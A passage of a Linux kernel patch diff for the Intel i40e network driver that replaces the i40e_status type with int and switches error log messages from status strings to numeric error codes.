+-i40e_status i40e_set_lan_tx_queue_context(struct i40e_hw *hw,
+-						    u16 queue,
+-						    struct i40e_hmc_obj_txq *s);
+-i40e_status i40e_clear_lan_rx_queue_context(struct i40e_hw *hw,
+-						      u16 queue);
+-i40e_status i40e_set_lan_rx_queue_context(struct i40e_hw *hw,
+-						    u16 queue,
+-						    struct i40e_hmc_obj_rxq *s);
++int i40e_init_lan_hmc(struct i40e_hw *hw, u32 txq_num,
++		      u32 rxq_num, u32 fcoe_cntx_num,
++		      u32 fcoe_filt_num);
++int i40e_configure_lan_hmc(struct i40e_hw *hw,
++			   enum i40e_hmc_model model);
++int i40e_shutdown_lan_hmc(struct i40e_hw *hw);
++
++int i40e_clear_lan_tx_queue_context(struct i40e_hw *hw,
++				    u16 queue);
++int i40e_set_lan_tx_queue_context(struct i40e_hw *hw,
++				  u16 queue,
++				  struct i40e_hmc_obj_txq *s);
++int i40e_clear_lan_rx_queue_context(struct i40e_hw *hw,
++				    u16 queue);
++int i40e_set_lan_rx_queue_context(struct i40e_hw *hw,
++				  u16 queue,
++				  struct i40e_hmc_obj_rxq *s);
+ 
+ #endif /* _I40E_LAN_HMC_H_ */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index 68f390ce4f6e2..0e01b1927c1c6 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -1817,13 +1817,13 @@ static int i40e_set_mac(struct net_device *netdev, void *p)
+ 	spin_unlock_bh(&vsi->mac_filter_hash_lock);
+ 
+ 	if (vsi->type == I40E_VSI_MAIN) {
+-		i40e_status ret;
++		int ret;
+ 
+ 		ret = i40e_aq_mac_address_write(hw, I40E_AQC_WRITE_TYPE_LAA_WOL,
+ 						addr->sa_data, NULL);
+ 		if (ret)
+-			netdev_info(netdev, "Ignoring error from firmware on LAA update, status %s, AQ ret %s\n",
+-				    i40e_stat_str(hw, ret),
++			netdev_info(netdev, "Ignoring error from firmware on LAA update, status %d, AQ ret %s\n",
++				    ret,
+ 				    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 	}
+ 
+@@ -1854,8 +1854,8 @@ static int i40e_config_rss_aq(struct i40e_vsi *vsi, const u8 *seed,
+ 		ret = i40e_aq_set_rss_key(hw, vsi->id, seed_dw);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Cannot set RSS key, err %s aq_err %s\n",
+-				 i40e_stat_str(hw, ret),
++				 "Cannot set RSS key, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			return ret;
+ 		}
+@@ -1866,8 +1866,8 @@ static int i40e_config_rss_aq(struct i40e_vsi *vsi, const u8 *seed,
+ 		ret = i40e_aq_set_rss_lut(hw, vsi->id, pf_lut, lut, lut_size);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Cannot set RSS lut, err %s aq_err %s\n",
+-				 i40e_stat_str(hw, ret),
++				 "Cannot set RSS lut, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			return ret;
+ 		}
+@@ -2349,7 +2349,7 @@ void i40e_aqc_del_filters(struct i40e_vsi *vsi, const char *vsi_name,
+ {
+ 	struct i40e_hw *hw = &vsi->back->hw;
+ 	enum i40e_admin_queue_err aq_status;
+-	i40e_status aq_ret;
++	int aq_ret;
+ 
+ 	aq_ret = i40e_aq_remove_macvlan_v2(hw, vsi->seid, list, num_del, NULL,
+ 					   &aq_status);
+@@ -2358,8 +2358,8 @@ void i40e_aqc_del_filters(struct i40e_vsi *vsi, const char *vsi_name,
+ 	if (aq_ret && !(aq_status == I40E_AQ_RC_ENOENT)) {
+ 		*retval = -EIO;
+ 		dev_info(&vsi->back->pdev->dev,
+-			 "ignoring delete macvlan error on %s, err %s, aq_err %s\n",
+-			 vsi_name, i40e_stat_str(hw, aq_ret),
++			 "ignoring delete macvlan error on %s, err %d, aq_err %s\n",
++			 vsi_name, aq_ret,
+ 			 i40e_aq_str(hw, aq_status));
+ 	}
+ }
+@@ -2423,13 +2423,13 @@ void i40e_aqc_add_filters(struct i40e_vsi *vsi, const char *vsi_name,
+  *
+  * Returns status indicating success or failure;
+  **/
+-static i40e_status
++static int
+ i40e_aqc_broadcast_filter(struct i40e_vsi *vsi, const char *vsi_name,
+ 			  struct i40e_mac_filter *f)
+ {
+ 	bool enable = f->state == I40E_FILTER_NEW;
+ 	struct i40e_hw *hw = &vsi->back->hw;
+-	i40e_status aq_ret;
++	int aq_ret;
+ 
+ 	if (f->vlan == I40E_VLAN_ANY) {
+ 		aq_ret = i40e_aq_set_vsi_broadcast(hw,
+@@ -2468,7 +2468,7 @@ static int i40e_set_promiscuous(struct i40e_pf *pf, bool promisc)
+ {
+ 	struct i40e_vsi *vsi = pf->vsi[pf->lan_vsi];
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status aq_ret;
++	int aq_ret;
+ 
+ 	if (vsi->type == I40E_VSI_MAIN &&
+ 	    pf->lan_veb != I40E_NO_VEB &&
+@@ -2488,8 +2488,8 @@ static int i40e_set_promiscuous(struct i40e_pf *pf, bool promisc)
+ 							   NULL);
+ 		if (aq_ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Set default VSI failed, err %s, aq_err %s\n",
+-				 i40e_stat_str(hw, aq_ret),
++				 "Set default VSI failed, err %d, aq_err %s\n",
++				 aq_ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		}
+ 	} else {
+@@ -2500,8 +2500,8 @@ static int i40e_set_promiscuous(struct i40e_pf *pf, bool promisc)
+ 						  true);
+ 		if (aq_ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "set unicast promisc failed, err %s, aq_err %s\n",
+-				 i40e_stat_str(hw, aq_ret),
++				 "set unicast promisc failed, err %d, aq_err %s\n",
++				 aq_ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		}
+ 		aq_ret = i40e_aq_set_vsi_multicast_promiscuous(
+@@ -2510,8 +2510,8 @@ static int i40e_set_promiscuous(struct i40e_pf *pf, bool promisc)
+ 						  promisc, NULL);
+ 		if (aq_ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "set multicast promisc failed, err %s, aq_err %s\n",
+-				 i40e_stat_str(hw, aq_ret),
++				 "set multicast promisc failed, err %d, aq_err %s\n",
++				 aq_ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		}
+ 	}
+@@ -2541,12 +2541,12 @@ int i40e_sync_vsi_filters(struct i40e_vsi *vsi)
+ 	unsigned int vlan_filters = 0;
+ 	char vsi_name[16] = "PF";
+ 	int filter_list_len = 0;
+-	i40e_status aq_ret = 0;
+ 	u32 changed_flags = 0;
+ 	struct hlist_node *h;
+ 	struct i40e_pf *pf;
+ 	int num_add = 0;
+ 	int num_del = 0;
++	int aq_ret = 0;
+ 	int retval = 0;
+ 	u16 cmd_flags;
+ 	int list_size;
+@@ -2814,9 +2814,9 @@ int i40e_sync_vsi_filters(struct i40e_vsi *vsi)
+ 			retval = i40e_aq_rc_to_posix(aq_ret,
+ 						     hw->aq.asq_last_status);
+ 			dev_info(&pf->pdev->dev,
+-				 "set multi promisc failed on %s, err %s aq_err %s\n",
++				 "set multi promisc failed on %s, err %d aq_err %s\n",
+ 				 vsi_name,
+-				 i40e_stat_str(hw, aq_ret),
++				 aq_ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		} else {
+ 			dev_info(&pf->pdev->dev, "%s allmulti mode.\n",
+@@ -2834,10 +2834,10 @@ int i40e_sync_vsi_filters(struct i40e_vsi *vsi)
+ 			retval = i40e_aq_rc_to_posix(aq_ret,
+ 						     hw->aq.asq_last_status);
+ 			dev_info(&pf->pdev->dev,
+-				 "Setting promiscuous %s failed on %s, err %s aq_err %s\n",
++				 "Setting promiscuous %s failed on %s, err %d aq_err %s\n",
+ 				 cur_promisc ? "on" : "off",
+ 				 vsi_name,
+-				 i40e_stat_str(hw, aq_ret),
++				 aq_ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		}
+ 	}
+@@ -2965,7 +2965,7 @@ int i40e_ioctl(struct net_device *netdev, struct ifreq *ifr, int cmd)
+ void i40e_vlan_stripping_enable(struct i40e_vsi *vsi)
+ {
+ 	struct i40e_vsi_context ctxt;
+-	i40e_status ret;
++	int ret;
+ 
+ 	/* Don't modify stripping options if a port VLAN is active */
+ 	if (vsi->info.pvid)
+@@ -2985,8 +2985,8 @@ void i40e_vlan_stripping_enable(struct i40e_vsi *vsi)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&vsi->back->pdev->dev,
+-			 "update vlan stripping failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&vsi->back->hw, ret),
++			 "update vlan stripping failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&vsi->back->hw,
+ 				     vsi->back->hw.aq.asq_last_status));
+ 	}
+@@ -2999,7 +2999,7 @@ void i40e_vlan_stripping_enable(struct i40e_vsi *vsi)
+ void i40e_vlan_stripping_disable(struct i40e_vsi *vsi)
+ {
+ 	struct i40e_vsi_context ctxt;
+-	i40e_status ret;
++	int ret;
+ 
+ 	/* Don't modify stripping options if a port VLAN is active */
+ 	if (vsi->info.pvid)
+@@ -3020,8 +3020,8 @@ void i40e_vlan_stripping_disable(struct i40e_vsi *vsi)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&vsi->back->pdev->dev,
+-			 "update vlan stripping failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&vsi->back->hw, ret),
++			 "update vlan stripping failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&vsi->back->hw,
+ 				     vsi->back->hw.aq.asq_last_status));
+ 	}
+@@ -3252,7 +3252,7 @@ static void i40e_restore_vlan(struct i40e_vsi *vsi)
+ int i40e_vsi_add_pvid(struct i40e_vsi *vsi, u16 vid)
+ {
+ 	struct i40e_vsi_context ctxt;
+-	i40e_status ret;
++	int ret;
+ 
+ 	vsi->info.valid_sections = cpu_to_le16(I40E_AQ_VSI_PROP_VLAN_VALID);
+ 	vsi->info.pvid = cpu_to_le16(vid);
+@@ -3265,8 +3265,8 @@ int i40e_vsi_add_pvid(struct i40e_vsi *vsi, u16 vid)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&vsi->back->pdev->dev,
+-			 "add pvid failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&vsi->back->hw, ret),
++			 "add pvid failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&vsi->back->hw,
+ 				     vsi->back->hw.aq.asq_last_status));
+ 		return -ENOENT;
+@@ -3429,8 +3429,8 @@ static int i40e_configure_tx_ring(struct i40e_ring *ring)
+ 	u16 pf_q = vsi->base_queue + ring->queue_index;
+ 	struct i40e_hw *hw = &vsi->back->hw;
+ 	struct i40e_hmc_obj_txq tx_ctx;
+-	i40e_status err = 0;
+ 	u32 qtx_ctl = 0;
++	int err = 0;
+ 
+ 	if (ring_is_xdp(ring))
+ 		ring->xsk_pool = i40e_xsk_pool(ring);
+@@ -3554,7 +3554,7 @@ static int i40e_configure_rx_ring(struct i40e_ring *ring)
+ 	u16 pf_q = vsi->base_queue + ring->queue_index;
+ 	struct i40e_hw *hw = &vsi->back->hw;
+ 	struct i40e_hmc_obj_rxq rx_ctx;
+-	i40e_status err = 0;
++	int err = 0;
+ 	bool ok;
+ 	int ret;
+ 
+@@ -5524,16 +5524,16 @@ static int i40e_vsi_get_bw_info(struct i40e_vsi *vsi)
+ 	struct i40e_aqc_query_vsi_bw_config_resp bw_config = {0};
+ 	struct i40e_pf *pf = vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret;
+ 	u32 tc_bw_max;
++	int ret;
+ 	int i;
+ 
+ 	/* Get the VSI level BW configuration */
+ 	ret = i40e_aq_query_vsi_bw_config(hw, vsi->seid, &bw_config, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi bw config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get PF vsi bw config, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -5543,8 +5543,8 @@ static int i40e_vsi_get_bw_info(struct i40e_vsi *vsi)
+ 					       NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi ets bw config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get PF vsi ets bw config, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -5585,7 +5585,7 @@ static int i40e_vsi_configure_bw_alloc(struct i40e_vsi *vsi, u8 enabled_tc,
+ {
+ 	struct i40e_aqc_configure_vsi_tc_bw_data bw_data;
+ 	struct i40e_pf *pf = vsi->back;
+-	i40e_status ret;
++	int ret;
+ 	int i;
+ 
+ 	/* There is no need to reset BW when mqprio mode is on.  */
+@@ -5733,8 +5733,8 @@ int i40e_update_adq_vsi_queues(struct i40e_vsi *vsi, int vsi_offset)
+ 
+ 	ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 	if (ret) {
+-		dev_info(&pf->pdev->dev, "Update vsi config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(hw, ret),
++		dev_info(&pf->pdev->dev, "Update vsi config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return ret;
+ 	}
+@@ -5789,8 +5789,8 @@ static int i40e_vsi_config_tc(struct i40e_vsi *vsi, u8 enabled_tc)
+ 						  &bw_config, NULL);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Failed querying vsi bw info, err %s aq_err %s\n",
+-				 i40e_stat_str(hw, ret),
++				 "Failed querying vsi bw info, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			goto out;
+ 		}
+@@ -5856,8 +5856,8 @@ static int i40e_vsi_config_tc(struct i40e_vsi *vsi, u8 enabled_tc)
+ 	ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Update vsi tc config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(hw, ret),
++			 "Update vsi tc config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -5869,8 +5869,8 @@ static int i40e_vsi_config_tc(struct i40e_vsi *vsi, u8 enabled_tc)
+ 	ret = i40e_vsi_get_bw_info(vsi);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed updating vsi bw info, err %s aq_err %s\n",
+-			 i40e_stat_str(hw, ret),
++			 "Failed updating vsi bw info, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -5961,8 +5961,8 @@ int i40e_set_bw_limit(struct i40e_vsi *vsi, u16 seid, u64 max_tx_rate)
+ 					  I40E_MAX_BW_INACTIVE_ACCUM, NULL);
+ 	if (ret)
+ 		dev_err(&pf->pdev->dev,
+-			"Failed set tx rate (%llu Mbps) for vsi->seid %u, err %s aq_err %s\n",
+-			max_tx_rate, seid, i40e_stat_str(&pf->hw, ret),
++			"Failed set tx rate (%llu Mbps) for vsi->seid %u, err %d aq_err %s\n",
++			max_tx_rate, seid, ret,
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	return ret;
+ }
+@@ -6037,8 +6037,8 @@ static void i40e_remove_queue_channels(struct i40e_vsi *vsi)
+ 			last_aq_status = pf->hw.aq.asq_last_status;
+ 			if (ret)
+ 				dev_info(&pf->pdev->dev,
+-					 "Failed to delete cloud filter, err %s aq_err %s\n",
+-					 i40e_stat_str(&pf->hw, ret),
++					 "Failed to delete cloud filter, err %d aq_err %s\n",
++					 ret,
+ 					 i40e_aq_str(&pf->hw, last_aq_status));
+ 			kfree(cfilter);
+ 		}
+@@ -6172,8 +6172,8 @@ static int i40e_vsi_reconfig_rss(struct i40e_vsi *vsi, u16 rss_size)
+ 	ret = i40e_config_rss(vsi, seed, lut, vsi->rss_table_size);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Cannot set RSS lut, err %s aq_err %s\n",
+-			 i40e_stat_str(hw, ret),
++			 "Cannot set RSS lut, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		kfree(lut);
+ 		return ret;
+@@ -6271,8 +6271,8 @@ static int i40e_add_channel(struct i40e_pf *pf, u16 uplink_seid,
+ 	ret = i40e_aq_add_vsi(hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "add new vsi failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "add new vsi failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw,
+ 				     pf->hw.aq.asq_last_status));
+ 		return -ENOENT;
+@@ -6303,7 +6303,7 @@ static int i40e_channel_config_bw(struct i40e_vsi *vsi, struct i40e_channel *ch,
+ 				  u8 *bw_share)
+ {
+ 	struct i40e_aqc_configure_vsi_tc_bw_data bw_data;
+-	i40e_status ret;
++	int ret;
+ 	int i;
+ 
+ 	memset(&bw_data, 0, sizeof(bw_data));
+@@ -6339,9 +6339,9 @@ static int i40e_channel_config_tx_ring(struct i40e_pf *pf,
+ 				       struct i40e_vsi *vsi,
+ 				       struct i40e_channel *ch)
+ {
+-	i40e_status ret;
+-	int i;
+ 	u8 bw_share[I40E_MAX_TRAFFIC_CLASS] = {0};
++	int ret;
++	int i;
+ 
+ 	/* Enable ETS TCs with equal BW Share for now across all VSIs */
+ 	for (i = 0; i < I40E_MAX_TRAFFIC_CLASS; i++) {
+@@ -6517,8 +6517,8 @@ static int i40e_validate_and_set_switch_mode(struct i40e_vsi *vsi)
+ 					mode, NULL);
+ 	if (ret && hw->aq.asq_last_status != I40E_AQ_RC_ESRCH)
+ 		dev_err(&pf->pdev->dev,
+-			"couldn't set switch config bits, err %s aq_err %s\n",
+-			i40e_stat_str(hw, ret),
++			"couldn't set switch config bits, err %d aq_err %s\n",
++			ret,
+ 			i40e_aq_str(hw,
+ 				    hw->aq.asq_last_status));
+ 
+@@ -6718,8 +6718,8 @@ int i40e_veb_config_tc(struct i40e_veb *veb, u8 enabled_tc)
+ 						   &bw_data, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "VEB bw config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "VEB bw config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -6728,8 +6728,8 @@ int i40e_veb_config_tc(struct i40e_veb *veb, u8 enabled_tc)
+ 	ret = i40e_veb_get_bw_info(veb);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed getting veb bw config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Failed getting veb bw config, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	}
+ 
+@@ -6812,8 +6812,8 @@ static int i40e_resume_port_tx(struct i40e_pf *pf)
+ 	ret = i40e_aq_resume_port_tx(hw, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Resume Port Tx failed, err %s aq_err %s\n",
+-			  i40e_stat_str(&pf->hw, ret),
++			 "Resume Port Tx failed, err %d aq_err %s\n",
++			  ret,
+ 			  i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		/* Schedule PF reset to recover */
+ 		set_bit(__I40E_PF_RESET_REQUESTED, pf->state);
+@@ -6837,8 +6837,8 @@ static int i40e_suspend_port_tx(struct i40e_pf *pf)
+ 	ret = i40e_aq_suspend_port_tx(hw, pf->mac_seid, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Suspend Port Tx failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Suspend Port Tx failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		/* Schedule PF reset to recover */
+ 		set_bit(__I40E_PF_RESET_REQUESTED, pf->state);
+@@ -6877,8 +6877,8 @@ static int i40e_hw_set_dcb_config(struct i40e_pf *pf,
+ 	ret = i40e_set_dcb_config(&pf->hw);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Set DCB Config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Set DCB Config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -6994,8 +6994,8 @@ int i40e_hw_dcb_config(struct i40e_pf *pf, struct i40e_dcbx_config *new_cfg)
+ 		 i40e_aqc_opc_modify_switching_comp_ets, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Modify Port ETS failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Modify Port ETS failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -7032,8 +7032,8 @@ int i40e_hw_dcb_config(struct i40e_pf *pf, struct i40e_dcbx_config *new_cfg)
+ 	ret = i40e_aq_dcb_updated(&pf->hw, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "DCB Updated failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "DCB Updated failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -7116,8 +7116,8 @@ int i40e_dcb_sw_default_config(struct i40e_pf *pf)
+ 		 i40e_aqc_opc_enable_switching_comp_ets, NULL);
+ 	if (err) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Enable Port ETS failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, err),
++			 "Enable Port ETS failed, err %d aq_err %s\n",
++			 err,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		err = -ENOENT;
+ 		goto out;
+@@ -7196,8 +7196,8 @@ static int i40e_init_pf_dcb(struct i40e_pf *pf)
+ 		pf->flags |= I40E_FLAG_DISABLE_FW_LLDP;
+ 	} else {
+ 		dev_info(&pf->pdev->dev,
+-			 "Query for DCB configuration failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, err),
++			 "Query for DCB configuration failed, err %d aq_err %s\n",
++			 err,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	}
+ 
+@@ -7415,15 +7415,15 @@ static void i40e_vsi_reinit_locked(struct i40e_vsi *vsi)
+  * @pf: board private structure
+  * @is_up: whether the link state should be forced up or down
+  **/
+-static i40e_status i40e_force_link_state(struct i40e_pf *pf, bool is_up)
++static int i40e_force_link_state(struct i40e_pf *pf, bool is_up)
+ {
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+ 	struct i40e_aq_set_phy_config config = {0};
+ 	bool non_zero_phy_type = is_up;
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status err;
+ 	u64 mask;
+ 	u8 speed;
++	int err;
+ 
+ 	/* Card might've been put in an unstable state by other drivers
+ 	 * and applications, which causes incorrect speed values being
+@@ -7435,8 +7435,8 @@ static i40e_status i40e_force_link_state(struct i40e_pf *pf, bool is_up)
+ 					   NULL);
+ 	if (err) {
+ 		dev_err(&pf->pdev->dev,
+-			"failed to get phy cap., ret =  %s last_status =  %s\n",
+-			i40e_stat_str(hw, err),
++			"failed to get phy cap., ret =  %d last_status =  %s\n",
++			err,
+ 			i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return err;
+ 	}
+@@ -7447,8 +7447,8 @@ static i40e_status i40e_force_link_state(struct i40e_pf *pf, bool is_up)
+ 					   NULL);
+ 	if (err) {
+ 		dev_err(&pf->pdev->dev,
+-			"failed to get phy cap., ret =  %s last_status =  %s\n",
+-			i40e_stat_str(hw, err),
++			"failed to get phy cap., ret =  %d last_status =  %s\n",
++			err,
+ 			i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return err;
+ 	}
+@@ -7492,8 +7492,8 @@ static i40e_status i40e_force_link_state(struct i40e_pf *pf, bool is_up)
+ 
+ 	if (err) {
+ 		dev_err(&pf->pdev->dev,
+-			"set phy config ret =  %s last_status =  %s\n",
+-			i40e_stat_str(&pf->hw, err),
++			"set phy config ret =  %d last_status =  %s\n",
++			err,
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return err;
+ 	}
+@@ -7656,11 +7656,11 @@ static void i40e_vsi_set_default_tc_config(struct i40e_vsi *vsi)
+  * This function deletes a mac filter on the channel VSI which serves as the
+  * macvlan. Returns 0 on success.
+  **/
+-static i40e_status i40e_del_macvlan_filter(struct i40e_hw *hw, u16 seid,
+-					   const u8 *macaddr, int *aq_err)
++static int i40e_del_macvlan_filter(struct i40e_hw *hw, u16 seid,
++				   const u8 *macaddr, int *aq_err)
+ {
+ 	struct i40e_aqc_remove_macvlan_element_data element;
+-	i40e_status status;
++	int status;
+ 
+ 	memset(&element, 0, sizeof(element));
+ 	ether_addr_copy(element.mac_addr, macaddr);
+@@ -7682,12 +7682,12 @@ static i40e_status i40e_del_macvlan_filter(struct i40e_hw *hw, u16 seid,
+  * This function adds a mac filter on the channel VSI which serves as the
+  * macvlan. Returns 0 on success.
+  **/
+-static i40e_status i40e_add_macvlan_filter(struct i40e_hw *hw, u16 seid,
+-					   const u8 *macaddr, int *aq_err)
++static int i40e_add_macvlan_filter(struct i40e_hw *hw, u16 seid,
++				   const u8 *macaddr, int *aq_err)
+ {
+ 	struct i40e_aqc_add_macvlan_element_data element;
+-	i40e_status status;
+ 	u16 cmd_flags = 0;
++	int status;
+ 
+ 	ether_addr_copy(element.mac_addr, macaddr);
+ 	element.vlan_tag = 0;
+@@ -7833,8 +7833,8 @@ static int i40e_fwd_ring_up(struct i40e_vsi *vsi, struct net_device *vdev,
+ 			rx_ring->netdev = NULL;
+ 		}
+ 		dev_info(&pf->pdev->dev,
+-			 "Error adding mac filter on macvlan err %s, aq_err %s\n",
+-			  i40e_stat_str(hw, ret),
++			 "Error adding mac filter on macvlan err %d, aq_err %s\n",
++			  ret,
+ 			  i40e_aq_str(hw, aq_err));
+ 		netdev_err(vdev, "L2fwd offload disabled to L2 filter error\n");
+ 	}
+@@ -7906,8 +7906,8 @@ static int i40e_setup_macvlans(struct i40e_vsi *vsi, u16 macvlan_cnt, u16 qcnt,
+ 	ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Update vsi tc config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(hw, ret),
++			 "Update vsi tc config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return ret;
+ 	}
+@@ -8122,8 +8122,8 @@ static void i40e_fwd_del(struct net_device *netdev, void *vdev)
+ 				ch->fwd = NULL;
+ 			} else {
+ 				dev_info(&pf->pdev->dev,
+-					 "Error deleting mac filter on macvlan err %s, aq_err %s\n",
+-					  i40e_stat_str(hw, ret),
++					 "Error deleting mac filter on macvlan err %d, aq_err %s\n",
++					  ret,
+ 					  i40e_aq_str(hw, aq_err));
+ 			}
+ 			break;
+@@ -8874,8 +8874,7 @@ static int i40e_delete_clsflower(struct i40e_vsi *vsi,
+ 	kfree(filter);
+ 	if (err) {
+ 		dev_err(&pf->pdev->dev,
+-			"Failed to delete cloud filter, err %s\n",
+-			i40e_stat_str(&pf->hw, err));
++			"Failed to delete cloud filter, err %d\n", err);
+ 		return i40e_aq_rc_to_posix(err, pf->hw.aq.asq_last_status);
+ 	}
+ 
+@@ -9437,8 +9436,8 @@ static int i40e_handle_lldp_event(struct i40e_pf *pf,
+ 			pf->flags &= ~I40E_FLAG_DCB_CAPABLE;
+ 		} else {
+ 			dev_info(&pf->pdev->dev,
+-				 "Failed querying DCB configuration data from firmware, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "Failed querying DCB configuration data from firmware, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 		}
+@@ -9886,8 +9885,8 @@ static void i40e_link_event(struct i40e_pf *pf)
+ {
+ 	struct i40e_vsi *vsi = pf->vsi[pf->lan_vsi];
+ 	u8 new_link_speed, old_link_speed;
+-	i40e_status status;
+ 	bool new_link, old_link;
++	int status;
+ #ifdef CONFIG_I40E_DCB
+ 	int err;
